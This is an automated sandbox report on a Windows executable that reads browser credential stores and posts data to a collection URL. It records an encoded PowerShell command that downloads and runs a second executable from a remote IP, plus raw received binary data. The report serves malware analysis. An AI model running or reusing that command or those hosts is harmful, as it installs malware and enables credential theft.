popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

aXSz3.exe

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 12, 2021, 10:42 a.m. April 12, 2021, 10:46 a.m.
Size 92.5KB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 6f504e4d2887038775a8636d246f38a1
SHA256 05d38ac5460418b0aa813fc8c582ee5be42be192de10d188332901157c54287c
CRC32 42F32246
ssdeep 1536:H7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfiwRwOr:b7DhdC6kzWypvaQ0FxyNTBfiOf
Yara
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsConsole - (no description)

Name Response Post-Analysis Lookup
prtboss.com
A 111.90.156.90
111.90.156.90
IP Address Status Action
111.90.156.90 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
23.92.213.108 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The specified path is invalid.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: 'sleep' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Missing operator.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Missing operator.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Missing operator.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Missing operator.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x0000000000000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001d1fb0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b83450
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b83450
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b83450
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98440
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98440
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98440
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98440
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b987c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b987c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b987c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b983d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b983d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b983d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98d70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98d70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98d70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98de0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98de0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98e50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98e50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98de0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98de0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002b98de0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001b7180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001b7180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001b6c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001b6c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002bc0aa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000002bc0aa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .code
packer PureBasic 4.x -> Neil Hodgson
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://23.92.213.108/po/tai1.exe
suspicious_features POST method with no referer header suspicious_request POST http://prtboss.com/collect.php
request GET http://23.92.213.108/po/tai1.exe
request POST http://prtboss.com/collect.php
request POST http://prtboss.com/collect.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2451000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26ce000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26ce000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26cf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef26ce000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00023000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00024000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00112000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00025000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00160000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00026000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00113000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0001a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00027000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4408
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
file C:\Users\test22\AppData\Local\Temp\FE6D.tmp\FE6E.tmp\FE6F.bat
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvADIAMwAuADkAMgAuADIAMQAzAC4AMQAwADgALwBwAG8ALwB0AGEAaQAxAC4AZQB4AGUAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwARAB5AEUAcQBPAGQAcABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAEQAeQBFAHEATwBkAHAAbQAuAGUAeABlAB0g
cmdline cMd.E"x"e 2ubishdata2/R = PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvADIAMwAuADkAMgAuADIAMQAzAC4AMQAwADgALwBwAG8ALwB0AGEAaQAxAC4AZQB4AGUAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwARAB5AEUAcQBPAGQAcABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAEQAeQBFAHEATwBkAHAAbQAuAGUAeABlAB0g
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000012c
process_name: pw.exe
process_identifier: 9028
1 1 0

Process32NextW

 snapshot_handle: 0x0000012c
process_name: taskhost.exe
process_identifier: 7240
1 1 0

Process32NextW

 snapshot_handle: 0x0000012c
process_name: DyEqOdpm.exe
process_identifier: 7476
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00003400', u'virtual_address': u'0x00013000', u'entropy': 7.111835561466392, u'name': u'.rdata', u'virtual_size': u'0x000033a5'} entropy 7.11183556147 description A section with a high entropy has been found
section {u'size_of_data': u'0x00001400', u'virtual_address': u'0x00019000', u'entropy': 7.617313454950168, u'name': u'.rsrc', u'virtual_size': u'0x00001324'} entropy 7.61731345495 description A section with a high entropy has been found
Data received U‹ìƒìd¡,(p‘IWEä‹¿`aJ¡ìJJÇEôgCOIÇEøK`OCfÇEüKoÆEþ.;~4V¾ìJJVè7ƒ=ìJJÿYuEä‹ÏP軗h!UHèo¡VèȜYY^‹Ç_ÉÃU‹ìƒìd¡,( IWEè‹¿¤PJ¡ì`JÇEølGZCfÇEüO^ÆEþ.;~4V¾ì`JVèÁœƒ=ì`JÿYuEè‹ÏPè*–hUHèù VèRœYY^‹Ç_ÉÃU‹ìQQd¡,ÇEølGZlfÇEüBZÆEþ.‹¡˜QJ;~9S»˜QJSè]œƒ=˜QJÿYu"VW¿ÈLJuøhóTH¥f¥¤è’ Sèë›YY_^[¸ÈLJÉÃU‹ìƒìd¡,ÇEðjKBKÇEôZKaLÇEøDKMZ‹¡hXJÆEü.;~9S»hXJSè雃=hXJÿYu"VW¿4WJuðhåTH¥¥¥¤è Sèw›YY_^[¸4WJÉÃU‹ìƒìd¡,( IWEì‹¿(PJ¡ ^JfÇEüjmÆEþ.;~4V¾ ^JVès›ƒ= ^JÿYuEì‹ÏP脖hÔTH諟Vè›YY^‹Ç_ÉÃU‹ìƒìd¡,ÇEð}KBKÇEôMZaLÇEøDKMZ‹¡ÔTJÆEü.;~9S»ÔTJS蛃=ÔTJÿYu"VW¿YJuðhÆTH¥¥¥¤è;ŸS蔚YY_^[¸YJÉÃU‹ìƒì d¡,ÇEôjKBKÇEøZKjmÆEü.‹¡œWJ;~8S»œWJS虚ƒ=œWJÿYu!VW¿OJuôh¹TH¥¥¤èϞSè(šYY_^[¸OJÉÃU‹ìƒìd¡,ÇEð|KIiÇEôKZxOÇEøB[Ko‹¡ÐTJÆEü.;~9S»ÐTJSè&šƒ=ÐTJÿYu"VW¿ÐOJuðhTH¥¥¥¤è[žS贙YY_^[¸ÐOJÉÃU‹ìƒìd¡,ÇEð|KIaÇEô^K@eÇEøKWkV‹¡„`JfÇEüo.;~:S»„`JS谙ƒ=„`JÿYu#VW¿hOJuðhŽTH¥¥¥f¥èäSè=™YY_^[¸hOJÉÃj h¶Iè>˳ƒeü‹Á÷Ð= r è⡉eèë'2ۈ]çë ‹Eì‹3Ɂ8ýÀ”Á‹ÁËeè2ۈ]çè”âƒMüÿŠÃe؋Mðd‰ _^[ÉÃU‹ìjjÿu 